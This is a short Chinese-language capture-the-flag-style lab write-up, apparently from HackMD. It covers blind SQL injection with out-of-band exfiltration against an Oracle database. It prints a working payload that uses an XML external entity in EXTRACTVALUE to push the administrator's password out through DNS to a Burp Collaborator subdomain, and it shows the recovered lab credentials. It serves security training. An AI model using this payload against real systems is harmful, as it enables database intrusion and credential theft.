# Web SQL injection Lab17 這題是進階版的 盲注 + Out-of-Band 資料外洩(Data Exfiltration),關鍵在於: 不只是讓伺服器去查 Collaborator,而是讓它把密碼資料塞進查詢的子網域,讓你在 Burp Collaborator 裡看到完整的資料。 --- 一樣先進入網站並攔截請求。   然後獲得專屬的 Collaborator 子網域。  ``` h3lzjvjshx3dqlmx1fj8qdfs3j9bx4lt.oastify.com ``` 接下來要發出 DNS 查詢。 ``` '+UNION+SELECT+EXTRACTVALUE(xmltype('<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http://'||(SELECT+password+FROM+users+WHERE+username='administrator')||'.abc123xyz.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual-- ``` :::info 因為要查詢密碼,所以在後面再塞一段密碼查詢語法。 ``` '||(SELECT+password+FROM+users+WHERE+username='administrator')||' ``` ::: 放入我們的子網域: ``` '+UNION+SELECT+EXTRACTVALUE(xmltype('<!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http://'||(SELECT+password+FROM+users+WHERE+username='administrator')||'.h3lzjvjshx3dqlmx1fj8qdfs3j9bx4lt.oastify.com/">+%25remote%3b]>'),'/l')+FROM+dual-- ```  成功送出後,我們到 Collaborator 中點 Poll now,就可以看到我們剛剛的 DNS 查詢紀錄。  把帳密拿去登入就可以完成本題。 `administra:hdch58dbionbxsfagrze`  ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up